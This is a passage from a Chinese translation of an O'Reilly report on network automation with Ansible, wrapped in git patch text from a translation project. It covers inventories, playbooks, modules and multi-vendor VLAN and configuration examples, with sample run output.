可以被用于去为所有类型的网络设备构建配置模板,然后,操作系统用这个方法去为所有的供应商生成一个配置文件,然后作为一个(通用数据模型的)输入设置。当然,如果有供应商专用的扩展,它也是会被用到的。这种灵活性不仅对迁移有帮助,而且也可以用于灾难恢复(DR),它在生产系统中不同的交换机型号之间和灾备数据中心中是经常使用的,即使是在不同的供应商的设备上。 + + +### 配置管理 + +正如前面所说的,配置管理是最常用的自动化类型。Ansible 可以很容易地做到创建 _角色(roles)_ 去简化基于任务的自动化。从更高的层面来看,角色是指针对一个特定设备组的可重用的自动化任务的逻辑分组。关于角色的另一种说法是,认为角色就是相关的工作流(workflows)。首先,在开始自动化添加值之前,需要理解工作流和过程。不论是开始一个小的自动化任务还是扩展它,理解工作流和过程都是非常重要的。 + +例如,一组自动化配置路由器和交换机的任务是非常常见的,并且它们也是一个很好的起点。但是,配置在哪台网络设备上?配置的 IP 地址是什么?或许需要一个 IP 地址管理方案?一旦用一个给定的功能分配了 IP 地址并且已经部署,DNS 也更新了吗?DHCP 的范围需要创建吗? + +你可以看到工作流是怎么从一个小的任务开始,然后逐渐扩展到跨不同的 IT 系统?因为工作流持续扩展,所以,角色也一样(持续扩展)。 + + +### 遵从性 + +和其它形式的自动化工具一样,用任何形式的自动化工具产生配置改变都视为风险。手工去产生改变可能看上去风险更大,正如你看到的和亲身经历过的那样,Ansible 有能力去做自动数据收集、监视、和配置构建,这些都是“只读的”和“低风险”的动作。其中一个 _低风险_ 使用案例是,使用收集的数据进行配置遵从性检查和配置验证。部署的配置是否满足安全要求?是否配置了所需的网络?协议 XYZ 禁用了吗?因为每个模块、或者用 Ansible 返回数据的整合,它只是非常简单地 _声明_ 那些事是 _TRUE_ 还是 _FALSE_。然后接着基于 _它_ 是 _TRUE_ 或者是 _FALSE_, 接着由你决定应该发生什么 —— 或许它只是被记录下来,或者,也可能执行一个复杂操作。 + +### 报告 + +我们现在知道,Ansible 也可以用于去收集数据和执行遵从性检查。Ansible 可以根据你想要做的事情去从设备中返回和收集数据。或许返回的数据成为其它的任务的输入,或者你想去用它创建一个报告。从模板中生成报告,并将真实的数据插入到模板中,创建和使用报告模板的过程与创建配置模板的过程是相同的。 + +从一个报告的角度看,这些模板或许是纯文本文件,就像是在 GitHub 上看到的 markdown 文件、放置在 Web 服务器上的 HTML 文件,等等。用户有权去创建一个她希望的报告类型,插入她所需要的真实数据到报告中。 + +创建报告的用处很多,不仅是为行政管理,也为了运营工程师,因为它们通常有双方都需要的不同指标。 + + +### Ansible 怎么工作 + +从一个网络自动化的角度理解了 Ansible 能做什么之后,我们现在看一下 Ansible 是怎么工作的。你将学习到从一个 Ansible 管理主机到一个被自动化的节点的全部通讯流。首先,我们回顾一下,Ansible 是怎么 _开箱即用的(out of the box)_,然后,我们看一下 Ansible 怎么去做到的,具体说就是,当网络设备自动化时,Ansible _模块_是怎么去工作的。 + +### 开箱即用 + +到目前为止,你已经明白了,Ansible 是一个自动化平台。实际上,它是一个安装在一台单个服务器上或者企业中任何一位管理员的笔记本中的轻量级的自动化平台。当然,(安装在哪里?)这是由你来决定的。在基于 Linux 的机器上,使用一些实用程序(比如 pip、apt、和 yum)安装 Ansible 是非常容易的。 + +###### 注意 + +在本报告的其余部分,安装 Ansible 的机器被称为 _控制主机_。 + +控制主机将执行在 Ansible 的 playbook (不用担心,稍后我们将讲到 playbook 和其它的 Ansible 术语)中定义的所有自动化任务。现在,我们只需要知道,一个 playbook 是简单的一组自动化任务和在给定数量的主机上执行的指令。 + +当一个 playbook 创建之后,你还需要去定义它要自动化的主机。映射一个 playbook 和要自动化运行的主机,是通过一个被称为 Ansible 清单的文件。这是一个前面展示的示例,但是,这里是同一个清单文件的另外两个组:`cisco` 和 `arista`: + +``` +[cisco] +nyc1.acme.com +nyc2.acme.com + +[arista] +sfo1.acme.com +sfo2.acme.com +``` + +###### 注意 + +你也可以在清单文件中使用 IP 地址,而不是主机名。对于这样的示例,主机名将是通过 DNS 可解析的。 + +正如你所看到的,Ansible 清单文件是一个文本文件,它列出了主机和主机组。然后,你可以在 playbook 中引用一个具体的主机或者组,以此去决定对给定的 play 和 playbook 在哪台主机上进行自动化。下面展示了两个示例。 + +展示的第一个示例它看上去像是,你想去自动化 `cisco` 组中所有的主机,而展示的第二个示例只对 _nyc1.acme.com_ 主机进行自动化: + +``` +--- + + - name: TEST PLAYBOOK + hosts: cisco + + tasks: + - TASKS YOU WANT TO AUTOMATE +``` + +``` +--- + + - name: TEST PLAYBOOK + hosts: nyc1.acme.com + + tasks: + - TASKS YOU WANT TO AUTOMATE +``` + +现在,我们已经理解了基本的清单文件,我们可以看一下(在控制主机上的)Ansible 是怎么与 _开箱即用_ 的设备通讯的,和在 Linux 终端上自动化的任务。这里需要明白一个重要的观点就是,需要去自动化的网络设备通常是不一样的。(译者注:指的是设备的类型、品牌、型号等等) + +Ansible 对基于 Linux 的系统去开箱即用自动化工作有两个要求。它们是 SSH 和 Python。 + +首先,终端必须支持 SSH 传输,因为 Ansible 使用 SSH 去连接到每个目标节点。因为 Ansible 支持一个可拔插的连接架构,也有各种类型的插件去实现不同类型的 SSH。 + +第二个要求是,Ansible 并不要求在目标节点上预先存在一个 _代理_,Ansible 并不要求一个软件代理,它仅需要一个内置的 Python 执行引擎。这个执行引擎用于去执行从 Ansible 管理主机发送到被自动化的目标节点的 Python 代码。 + +如果我们详细解释这个开箱即用工作流,它将分解成如下的步骤: + +1. 当一个 Ansible play 被执行,控制主机使用 SSH 连接到基于 Linux 的目标节点。 + +2. 对于每个任务,也就是说,Ansible 模块将在这个 play 中被执行,通过 SSH 发送 Python 代码并直接在远程系统中执行。 + +3. 在远程系统上运行的每个 Ansible 模块将返回 JSON 数据到控制主机。这些数据包含有信息,比如,配置改变、任务成功/失败、以及其它模块特定的数据。 + +4. JSON 数据返回给 Ansible,然后被用于去生成报告,或者被用作接下来模块的输入。 + +5. 在 play 中为每个任务重复第 3 步。 + +6. 在 playbook 中为每个 play 重复第 1 步。 + +是不是意味着每个网络设备都可以被 Ansible 开箱即用?因为它们也都支持 SSH,确实,网络设备都支持 SSH,但是,它是第一个和第二要求的组合限制了网络设备可能的功能。 + +刚开始时,大多数网络设备并不支持 Python,因此,使用默认的 Ansible 连接机制是无法进行的。换句话说,在过去的几年里,供应商在几个不同的设备平台上增加了 Python 支持。但是,这些平台中的大多数仍然缺乏必要的集成,以允许 Ansible 去直接通过 SSH 访问一个 Linux shell,并以适当的权限去拷贝所需的代码、创建临时目录和文件、以及在设备中执行代码。尽管 Ansible 中所有的这些部分都可以在基于 Linux 的网络设备上使用 SSH/Python 在本地运行,它仍然需要网络设备供应商去更进一步开放他们的系统。 + +###### 注意 + +值的注意的是,Arista 确实也提供了原生的集成,因为它可以放弃 SSH 用户,直接进入到一个 Linux shell 中访问 Python 引擎,它可以允许 Ansible 去使用默认连接机制。因为我们调用了 Arista,我们也需要着重强调与 Ansible 默认连接机制一起工作的 Cumulus。这是因为 Cumulus Linux 是原生 Linux,并且它并不需要为 Cumulus Linux 操作系统使用供应商 API。 + +### Ansible 网络集成 + +前面的节讲到过 Ansible 默认的工作方式。我们看一下,在开始一个 _play_ 之后,Ansible 是怎么去设置一个到设备的连接、通过执行拷贝 Python 代码到设备去运行任务、运行代码、和返回结果给 Ansible 控制主机。 + +在这一节中,我们将看一看,当使用 Ansible 进行自动化网络设备时都做了什么。正如前面讲过的,Ansible 是一个可拔插的连接架构。对于 _大多数_ 的网络集成, `connection` 参数设置为 `local`。在 playbook 中大多数的连接类型都设置为 `local`,如下面的示例所展示的: + +``` +--- + + - name: TEST PLAYBOOK + hosts: cisco + connection: local + + tasks: + - TASKS YOU WANT TO AUTOMATE +``` + +注意在 play 中是怎么定义的,这个示例增加 `connection` 参数去和前面节中的示例进行比较。 + +这告诉 Ansible 不要通过 SSH 去连接到目标设备,而是连接到本地机器运行这个 playbook。基本上,这是把连接职责委托给 playbook 中 _任务_ 节中使用的真实的 Ansible 模块。每个模块类型的委托权利允许这个模块在必要时以各种形式去连接到设备。这可能是 Juniper 和 HP Comware7 的 NETCONF、Arista 的 eAPI、Cisco Nexus 的 NX-API、或者甚至是基于传统系统的 SNMP,它们没有可编程的 API。 + +###### 注意 + +网络集成在 Ansible 中是以 Ansible 模块的形式带来的。尽管我们持续使用术语来吊你的胃口,比如,playbooks、plays、任务、和讲到的关键概念 `模块`,这些术语中的每一个都会在 [Ansible 术语和入门][3] 和 [动手实践使用 Ansible 去进行网络自动化][4] 中详细解释。 + +让我们看一看另外一个 playbook 的示例: + +``` +--- + + - name: TEST PLAYBOOK + hosts: cisco + connection: local + + tasks: + - nxos_vlan: vlan_id=10 name=WEB_VLAN +``` + +你注意到了吗,这个 playbook 现在包含一个任务,并且这个任务使用了 `nxos_vlan` 模块。`nxos_vlan` 模块是一个 Python 文件,并且,在这个文件中它是使用 NX-API 连接到 Cisco 的 NX-OS 设备。可是,这个连接可能是使用其它设备 API 设置的,这就是为什么供应商和用户像我们这样能够去建立自己的集成的原因。集成(模块)通常是以每特性(per-feature)为基础完成的,虽然,你已经看到了像 `napalm_install_config` 这样的模块,它们也可以被用来 _推送_ 一个完整的配置文件。 + +主要区别之一是使用的默认连接机制,Ansible 启动一个持久的 SSH 连接到设备,并且这个连接为一个给定的 play 持续。当在一个模块中发生连接设置和拆除时,与许多使用 `connection=local` 的网络模块一样,对发生在 play 级别上的 _每个_ 任务,Ansible 将登入/登出设备。 + +而在传统的 Ansible 形式下,每个网络模块返回 JSON 数据。仅有的区别是相对于目标节点,数据的推取发生在本地的 Ansible 控制主机上。相对于每供应商(per vendor)和模块类型,数据返回到 playbook,但是作为一个示例,许多的 Cisco NX-OS 模块返回已存在的状态、建议状态、和最终状态,以及发送到设备的命令(如果有的话)。 + +作为使用 Ansible 进行网络自动化的开始,最重要的是,为 Ansible 的连接设备/拆除过程,记着去设置连接参数为 `local`,并且将它留在模块中。这就是为什么模块支持不同类型的供应商平台,它将与设备使用不同的方式进行通讯。 + + +### Ansible 术语和入门 + +这一章我们将介绍许多 Ansible 的术语和报告中前面部分出现过的关键概念。比如, _清单文件_、_playbook_、_play_、_任务_、和 _模块_。我们也会去回顾一些其它的概念,这些术语和概念对我们学习使用 Ansible 去进行网络自动化非常有帮助。 + +在这一节中,我们将引用如下的一个简单的清单文件和 playbook 的示例,它们将在后面的章节中持续出现。 + +_清单示例_: + +``` +# sample inventory file +# filename inventory + +[all:vars] +user=admin +pwd=admin + +[tor] +rack1-tor1 vendor=nxos +rack1-tor2 vendor=nxos +rack2-tor1 vendor=arista +rack2-tor2 vendor=arista + +[core] +core1 +core2 +``` + +_playbook 示例_: + +``` +--- +# sample playbook +# filename site.yml + + - name: PLAY 1 - Top of Rack (TOR) Switches + hosts: tor + connection: local + + tasks: + - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES + nxos_vlan: + vlan_id=10 + name=WEB_VLAN + host={{ inventory_hostname }} + username=admin + password=admin + when: vendor == "nxos" + + - name: ENSURE VLAN 10 EXISTS ON ARISTA TOR SWITCHES + eos_vlan: + vlanid=10 + name=WEB_VLAN + host={{ inventory_hostname }} + username={{ user }} + password={{ pwd }} + when: vendor == "arista" + + - name: PLAY 2 - Core (TOR) Switches + hosts: core + connection: local + + tasks: + - name: ENSURE VLANS EXIST IN CORE + nxos_vlan: + vlan_id={{ item }} + host={{ inventory_hostname }} + username={{ user }} + password={{ pwd }} + with_items: + - 10 + - 20 + - 30 + - 40 + - 50 +``` + +### 清单文件 + +使用一个清单文件,比如前面提到的那个,允许我们去为自动化任务指定主机、和使用每个 play 顶部节中(如果存在)的参数 `hosts` 所引用的主机/组指定的主机组。 + +它也可能在一个清单文件中存储变量。如这个示例中展示的那样。如果变量在同一行视为一台主机,它是一个具体主机变量。如果变量定义在方括号中(“[ ]”),比如,`[all:vars]`,它的意思是指变量在组中的范围 `all`,它是一个默认组,包含了清单文件中的 _所有_ 主机。 + +###### 注意 + +清单文件是使用 Ansible 开始自动化的快速方法,但是,你应该已经有一个真实的网络设备源,比如一个网络管理工具或者 CMDB,它可以去创建和使用一个动态的清单脚本,而不是一个静态的清单文件。 + +### Playbook + +playbook 是去运行自动化网络设备的顶级对象。在我们的示例中,它是一个 _site.yml_ 文件,如前面的示例所展示的。一个 playbook 使用 YAML 去定义一组自动化任务,并且,每个 playbook 由一个或多个 plays 组成。这类似于一个橄榄球的剧本。就像在橄榄球赛中,团队有剧集组成的剧本,Ansible 的 playbooks 也是由 play 组成的。 + +###### 注意 + +YAML 是一种被所有编程语言支持的数据格式。YAML 本身就是 JSON 的超集,并且,YAML 文件非常易于识别,因为它总是三个破折号(连字符)开始,比如,`---`。 + + +### Play + +一个 Ansible playbook 可以存在一个或多个 plays。在前面的示例中,它在 playbook 中有两个 plays。每个 play 开始的地方都有一个 _header_ 节,它定义了具体的参数。 + +示例中两个 plays 都定义了下面的参数: + +`name` + +文件 `PLAY 1 - Top of Rack (TOR) Switches` 是任意内容的,它在 playbook 运行的时候,去改善 playbook 运行和报告期间的可读性。这是一个可选参数。 + +`hosts` + +正如前面讲过的,这是在特定的 play 中要去进行自动化的主机或主机组。这是一个必需参数。 + +`connection` + +正如前面讲过的,这是 play 连接机制的类型。这是个可选参数,但是,对于网络自动化 plays,一般设置为 `local`。 + + + +每个 play 都是由一个或多个任务组成。 + + + +### 任务 + +任务是以声明的方式去表示自动化的内容,而不用担心底层的语法或者操作是怎么执行的。 + +在我们的示例中,第一个 play 有两个任务。每个任务确保存在 10 个 VLAN。第一个任务是为 Cisco Nexus 设备的,而第二个任务是为 Arista 设备的: + +``` +tasks: + - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES + nxos_vlan: + vlan_id=10 + name=WEB_VLAN + host={{ inventory_hostname }} + username=admin + password=admin + when: vendor == "nxos" +``` + +任务也可以使用 `name` 参数,就像 plays 一样。和 plays 一样,文本内容是任意的,并且当 playbook 运行时显示,去改善 playbook 运行和报告期间的可读性。它对每个任务都是可选参数。 + +示例任务中的下一行是以 `nxos_vlan` 开始的。它告诉我们这个任务将运行一个叫 `nxos_vlan` 的 Ansible 模块。 + +现在,我们将进入到模块中。 + + + +### 模块 + +在 Ansible 中理解模块的概念是至关重要的。虽然任何编辑语言都可以用来写 Ansible 模块,只要它们能够返回 JSON 键 — 值对即可,但是,几乎所有的模块都是用 Python 写的。在我们示例中,我们看到有两个模块被运行: `nxos_vlan` 和 `eos_vlan`。这两个模块都是 Python 文件;而事实上,在你不能看到 playbook 的时候,真实的文件名分别是 _eos_vlan.py_ 和 _nxos_vlan.py_。 + +让我们看一下前面的示例中第一个 play 中的第一个 任务: + +``` + - name: ENSURE VLAN 10 EXISTS ON CISCO TOR SWITCHES + nxos_vlan: + vlan_id=10 + name=WEB_VLAN + host={{ inventory_hostname }} + username=admin + password=admin + when: vendor == "nxos" +``` + +这个任务运行 `nxos_vlan`,它是一个自动配置 VLAN 的模块。为了使用这个模块,包含它,你需要为设备指定期望的状态或者配置策略。这个示例中的状态是:VLAN 10 将被配置一个名字 `WEB_VLAN`,并且,它将被自动配置到每个交换机上。我们可以看到,使用 `vlan_id` 和 `name` 参数很容易做到。模块中还有三个其它的参数,它们分别是:`host`、`username`、和 `password`: + +`host` + +这是将要被自动化的主机名(或者 IP 地址)。因为,我们希望去自动化的设备已经被定义在清单文件中,我们可以使用内置的 Ansible 变量 `inventory_hostname`。这个变量等价于清单文件中的内容。例如,在第一个循环中,在清单文件中的主机是 `rack1-tor1`,然后,在第二个循环中,它是 `rack1-tor2`。这些名字是进入到模块的,并且包含在模块中的,在每个名字到 IP 地址的解析中,都发生一个 DNS 查询。然后与这个设备进行通讯。 + +`username` + +用于登入到交换机的用户名。 + + +`password` + +用于登入到交换机的密码。 + + +示例中最后的片断部分使用了一个 `when` 语句。这是在一个 play 中使用的 Ansible 的执行条件任务。正如我们所了解的,在这个 play 的 `tor` 组中有多个设备和设备类型。使用 `when` 基于任意标准去提供更多的选择。这里我们仅自动化 Cisco 设备,因为,我们在这个任务中使用了 `nxos_vlan` 模块,在下一个任务中,我们仅自动化 Arista 设备,因为,我们使用了 `eos_vlan` 模块。 + +###### 注意 + +这并不是区分设备的唯一方法。这里仅是演示如何使用 `when`,并且可以在清单文件中定义变量。 + +在清单文件中定义变量是一个很好的开端,但是,如果你继续使用 Ansible,你将会为了扩展性、版本控制、对给定文件的改变最小化而去使用基于 YAML 的变量。这也将简化和改善清单文件和每个使用的变量的可读性。在设备准备的构建/推送方法中讲过一个变量文件的示例。 + +在最后的示例中,关于任务有几点需要去搞清楚: + +* Play 1 任务 1 展示了硬编码了 `username` 和 `password` 作为参数进入到具体的模块中(`nxos_vlan`)。 + +* Play 1 任务 1 和 play 2 在模块中使用了变量,而不是硬编码它们。这掩饰了 `username` 和 `password` 参数,但是,需要值得注意的是,(在这个示例中)这些变量是从清单文件中提取出现的。 + +* Play 1 中为进入到模块中的参数使用了一个 _水平的(horizontal)_ 的 key=value 语法,虽然 play 2 使用了垂直的(vertical) key=value 语法。它们都工作的非常好。你也可以使用垂直的 YAML “key: value” 语法。 + +* 最后的任务也介绍了在 Ansible 中怎么去使用一个 _loop_ 循环。它通过使用 `with_items` 来完成,并且它类似于一个 for 循环。那个特定的任务是循环进入五个 VLANs 中去确保在交换机中它们都存在。注意:它也可能被保存在一个外部的 YAML 变量文件中。还需要注意的一点是,不使用 `with_items` 的替代方案是,每个 VLAN 都有一个任务 —— 如果这样做,它就失去了弹性! + + +### 动手实践使用 Ansible 去进行网络自动化 + +在前面的章节中,提供了 Ansible 术语的一个概述。它已经覆盖了大多数具体的 Ansible 术语,比如 playbooks、plays、任务、模块、和清单文件。这一节将继续提供示例去讲解使用 Ansible 实现网络自动化,而且将提供在不同类型的设备中自动化工作的模块的更多细节。示例中的将要进行自动化设备由多个供应商提供,包括 Cisco、Arista、Cumulus、和 Juniper。 + +在本节中的示例,假设的前提条件如下: + +* Ansible 已经安装。 + +* 在设备中(NX-API、eAPI、NETCONF)适合的 APIs 已经启用。 + +* 用户在系统上有通过 API 去产生改变的适当权限。 + +* 所有的 Ansible 模块已经在系统中存在,并且也在库的路径变量中。 + +###### 注意 + +可以在 _ansible.cfg_ 文件中设置模块和库路径。在你运行一个 playbook 时,你也可以使用 `-M` 标志从命令行中去改变它。 + +在本节中示例使用的清单如下。(删除了密码,IP 地址也发生了变化)。在这个示例中,(和前面的示例一样)某些主机名并不是完全合格域名(FQDNs)。 + + +### 清单文件 + +``` +[cumulus] +cvx ansible_ssh_host=1.2.3.4 ansible_ssh_pass=PASSWORD + +[arista] +veos1 + +[cisco] +nx1 hostip=5.6.7.8 un=USERNAME pwd=PASSWORD + +[juniper] +vsrx hostip=9.10.11.12 un=USERNAME pwd=PASSWORD +``` + +###### 注意 + +正如你所知道的,Ansible 支持将密码存储在一个加密文件中的功能。如果你想学习关于这个特性的更多内容,请查看在 Ansible 网站上的文档中的 [Ansible Vault][5] 部分。 + +这个清单文件有四个组,每个组定义了一台单个的主机。让我们详细回顾一下每一节: + +Cumulus + +主机 `cvx` 是一个 Cumulus Linux (CL) 交换机,并且它是 `cumulus` 组中的唯一设备。记住,CL 是原生 Linux,因此,这意味着它是使用默认连接机制(SSH)连到到需要自动化的 CL 交换机。因为 `cvx` 在 DNS 或者 _/etc/hosts_ 文件中没有定义,我们将让 Ansible 知道不要在清单文件中定义主机名,而是在 `ansible_ssh_host` 中定义的名字/IP。登陆到 CL 交换机的用户名被定义在 playbook 中,但是,你可以看到密码使用变量 `ansible_ssh_pass` 定义在清单文件中。 + +Arista + +被称为 `veos1` 的是一台运行 EOS 的 Arista 交换机。它是在 `arista` 组中唯一的主机。正如你在 Arista 中看到的,在清单文件中并没有其它的参数存在。这是因为 Arista 为它们的设备使用了一个特定的配置文件。在我们的示例中它的名字为 _.eapi.conf_,它存在在 home 目录中。下面是正确使用配置文件的这个功能的示例: + +``` +[connection:veos1] +host: 2.4.3.4 +username: unadmin +password: pwadmin +``` + +这个文件包含了定义在配置文件中的 Ansible 连接到设备(和 Arista 的被称为 _pyeapi_ 的 Python 库)所需要的全部信息。 + +Cisco + +和 Cumulus 和 Arista 一样,这里仅有一台主机(`nx1`)存在于 `cisco` 组中。这是一台 NX-OS-based Cisco Nexus 交换机。注意在这里为 `nx1` 定义了三个变量。它们包括 `un` 和 `pwd`,这是为了在 playbook 中访问和为了进入到 Cisco 模块去连接到设备。另外,这里有一个称为 `hostip` 的参数,它是必需的,因为,`nx1` 没有在 DNS 中或者是 _/etc/hosts_ 配置文件中定义。 + + +###### 注意 + +如果自动化一个原生的 Linux 设备,我们可以将这个参数命名为任何东西。`ansible_ssh_host` 被用于到如我们看到的那个 Cumulus 示例(如果在清单文件中的定义不能被解析)。在这个示例中,我们将一直使用 `ansible_ssh_host`,但是,它并不是必需的,因为我们将这个变量作为一个参数进入到 Cisco 模块,而 `ansible_ssh_host` 是在使用默认的 SSH 连接机制时自动检查的。 + +Juniper + +和前面的三个组和主机一样,在 `juniper` 组中有一个单个的主机 `vsrx`。它在清单文件中的设置与 Cisco 相同,因为两者在 playbook 中使用了相同的方式。 + + +### Playbook + +接下来的 playbook 有四个不同的 plays。每个 play 是基于特定的供应商类型的设备组的自动化构建的。注意,那是在一个单个的 playbook 中执行这些任务的唯一的方法。这里还有其它的方法,它可以使用条件(`when` 语句)或者创建 Ansible 角色(它在这个报告中没有介绍)。 + +这里有一个 playbook 的示例: + +``` +--- + + - name: PLAY 1 - CISCO NXOS + hosts: cisco + connection: local + + tasks: + - name: ENSURE VLAN 100 exists on Cisco Nexus switches + nxos_vlan: + vlan_id=100 + name=web_vlan + host={{ hostip }} + username={{ un }} + password={{ pwd }} + + - name: PLAY 2 - ARISTA EOS + hosts: arista + connection: local + + tasks: + - name: ENSURE VLAN 100 exists on Arista switches + eos_vlan: + vlanid=100 + name=web_vlan + connection={{ inventory_hostname }} + + - name: PLAY 3 - CUMULUS + remote_user: cumulus + sudo: true + hosts: cumulus + + tasks: + - name: ENSURE 100.10.10.1 is configured on swp1 + cl_interface: name=swp1 ipv4=100.10.10.1/24 + + - name: restart networking without disruption + shell: ifreload -a + + - name: PLAY 4 - JUNIPER SRX changes + hosts: juniper + connection: local + + tasks: + - name: INSTALL JUNOS CONFIG + junos_install_config: + host={{ hostip }} + file=srx_demo.conf + user={{ un }} + passwd={{ pwd }} + logfile=deploysite.log + overwrite=yes + diffs_file=junpr.diff +``` + +你将注意到,前面的两个 plays 是非常类似的,我们已经在最初的 Cisco 和 Arista 示例中讲过了。唯一的区别是每个要自动化的组(`cisco` and `arista`) 定义了它们自己的 play,我们在前面介绍使用 `when` 条件时比较过。 + +这里有一个不正确的或者是错误的方式去做这些。这取决于你预先知道的信息是什么和适合你的环境和使用的最佳案例是什么,但我们的目的是为了展示做同一件事的几种不同的方法。 + +第三个 play 是在 Cumulus Linux 交换机的 `swp1` 接口上进行自动化配置。在这个 play 中的第一个任务是去确认 `swp1` 是一个三层接口,并且它配置的 IP 地址是 100.10.10.1。因为 Cumulus Linux 是原生的 Linux,网络服务在改变后需要重启才能生效。这也可以使用 Ansible 的操作来达到这个目的(这已经超出了本报告讨论的范围),这里有一个被称为 `service` 的 Ansible 核心模块来做这些,但它会中断交换机上的网络;使用 `ifreload` 重新启动则不会中断。 + +本节到现在为止,我们已经讲解了专注于特定任务的 Ansible 模块,比如,配置接口和 VLANs。第四个 play 使用了另外的选项。我们将看到一个 _pushes_ 模块,它是一个完整的配置文件并且立即激活它作为正在运行的新的配置。这里将使用 `napalm_install_config`来展示前面的示例,但是,这个示例使用了一个 Juniper 专用的模块。 + +`junos_install_config` 模块接受几个参数,如下面的示例中所展示的。到现在为止,你应该理解了什么是 `user`、`passwd`、和 `host`。其它的参数定义如下: + +`file` + +这是一个从 Ansible 控制主机拷贝到 Juniper 设备的配置文件。 + +`logfile` + +这是可选的,但是,如果你指定它,它会被用于存储运行这个模块时生成的信息。 + +`overwrite` + +当你设置为 yes/true 时,完整的配置将被发送的配置覆盖。(默认是 false) + +`diffs_file` + +这是可选的,但是,如果你指定它,当应用配置时,它将存储生成的差异。当应用配置时将存储一个生成的差异。当正好更改了主机名,但是,仍然发送了一个完整的配置文件时会生成一个差异,如下的示例: + +``` +# filename: junpr.diff +[edit system] +- host-name vsrx; ++ host-name vsrx-demo; +``` + + +上面已经介绍了 playbook 概述的细节。现在,让我们看看当 playbook 运行时发生了什么: + +###### 注意 + +注意:`-i` 标志是用于指定使用的清单文件。也可以设置环境变量 `ANSIBLE_HOSTS`,而不用每次运行 playbook 时都去使用一个 `-i` 标志。 + +``` +ntc@ntc:~/ansible/multivendor$ ansible-playbook -i inventory demo.yml + +PLAY [PLAY 1 - CISCO NXOS] ************************************************* + +TASK: [ENSURE VLAN 100 exists on Cisco Nexus switches] ********************* +changed: [nx1] + +PLAY [PLAY 2 - ARISTA EOS] ************************************************* + +TASK: [ENSURE VLAN 100 exists on Arista switches] ************************** +changed: [veos1] + +PLAY [PLAY 3 - CUMULUS] **************************************************** + +GATHERING FACTS ************************************************************ +ok: [cvx] + +TASK: [ENSURE 100.10.10.1 is configured on swp1] *************************** +changed: [cvx] + +TASK: [restart networking without disruption] ****************************** +changed: [cvx] + +PLAY [PLAY 4 - JUNIPER SRX changes] **************************************** + +TASK: [INSTALL JUNOS CONFIG] *********************************************** +changed: [vsrx] + +PLAY RECAP *************************************************************** + to retry, use: --limit @/home/ansible/demo.retry + +cvx : ok=3 changed=2 unreachable=0 failed=0 +nx1 : ok=1 changed=1 unreachable=0 failed=0 +veos1 : ok=1 changed=1 unreachable=0 failed=0 +vsrx : ok=1 changed=1 unreachable=0 failed=0 +``` + +你可以看到每个任务成功完成;如果你是在终端上运行,你将看到用琥珀色显示的每个改变的任务。 + +让我们再次运行 playbook。通过再次运行,我们可以校验所有模块的 _幂等性_;当我们这样做的时候,我们看到设备上 _没有_ 产生变化,并且所有的东西都是绿色的: + +``` +PLAY [PLAY 1 - CISCO NXOS] *************************************************** + +TASK: [ENSURE VLAN 100 exists on Cisco Nexus switches] *********************** +ok: [nx1] + +PLAY [PLAY 2 - ARISTA EOS] *************************************************** + +TASK: [ENSURE VLAN 100 exists on Arista switches] **************************** +ok: [veos1] + +PLAY [PLAY 3 - CUMULUS] ****************************************************** + +GATHERING FACTS ************************************************************** +ok: [cvx] + +TASK: [ENSURE 100.10.10.1 is configured on swp1] ***************************** +ok: [cvx] + +TASK: [restart networking without disruption] ******************************** +skipping: [cvx] + +PLAY [PLAY 4 - JUNIPER SRX changes] ****************************************** + +TASK: [INSTALL JUNOS CONFIG] ************************************************* +ok: [vsrx] + +PLAY RECAP *************************************************************** +cvx : ok=2 changed=0 unreachable=0 failed=0 +nx1 : ok=1 changed=0 unreachable=0 failed=0 +veos1 : ok=1 changed=0 unreachable=0 failed=0 +vsrx : ok=1 changed=0 unreachable=0 failed=0 +``` + +注意:这里有 0 个改变,但是,每次运行任务,正如期望的那样,它们都返回 “ok”。说明在这个 playbook 中的每个模块都是幂等的。 + + +### 总结 + +Ansible 是一个超级简单的、无代理和可扩展的自动化平台。网络社区持续不断地围绕 Ansible 去重整它作为一个能够执行一些自动化网络任务的平台,比如,做配置管理、数据收集和报告,等等。你可以使用 Ansible 去推送完整的配置文件,配置具体的使用幂等模块的网络资源,比如,接口、VLANs,或者,简单地自动收集信息,比如,领居、序列号、启动时间、和接口状态,以及按你的需要定制一个报告。 + +因为它的架构,Ansible 被证明是一个在这里可用的、非常好的工具,它可以帮助你实现从传统的基于 _CLI/SNMP_ 的网络设备到基于 _API 驱动_ 的现代化网络设备的自动化。 + +在网络社区中,易于使用和无代理架构的 Ansible 的占比持续增加,它将使没有 APIs 的设备(CLI/SNMP)的自动化成为可能。包括独立的交换机、路由器、和 4-7 层的服务应用程序;甚至是提供了 RESTful API 的那些软件定义网络控制器。 + +当使用 Ansible 实现网络自动化时,不会落下任何设备。 + +----------- + +作者简介: + + ![](https://d3tdunqjn7n0wj.cloudfront.net/360x360/jason-edelman-crop-5b2672f569f553a3de3a121d0179efcb.jpg) + +Jason Edelman,CCIE 15394 & VCDX-NV 167,出生并成长于新泽西州的一位网络工程师。他是一位典型的 “CLI 爱好者” 和 “路由器小子”。在几年前,他决定更多地关注于软件、开发实践、以及怎么与网络工程融合。Jason 目前经营着一个小的咨询公司,公司名为:Network to Code(http://networktocode.com/),帮助供应商和终端用户利用新的工具和技术来减少他们的低效率操作... + +-------------------------------------------------------------------------------- + +via: https://www.oreilly.com/learning/network-automation-with-ansible + +作者:[Jason Edelman][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.oreilly.com/people/ee4fd-jason-edelman +[1]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_terminology_and_getting_started +[2]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_network_integrations +[3]:https://www.oreilly.com/learning/network-automation-with-ansible#ansible_terminology_and_getting_started +[4]:https://www.oreilly.com/learning/network-automation-with-ansible#handson_look_at_using_ansible_for_network_automation +[5]:http://docs.ansible.com/ansible/playbooks_vault.html +[6]:https://www.oreilly.com/people/ee4fd-jason-edelman +[7]:https://www.oreilly.com/people/ee4fd-jason-edelman From edda2fdfede28cefdbcddfac9a800d6050cda92c Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Tue, 28 Nov 2017 16:37:20 +0800 Subject: [PATCH 0027/1627] Translated by qhwdw Translated by qhwdw --- ...0160325 Network automation with Ansible.md | 993 ------------------ 1 file changed, 993 deletions(-) delete mode 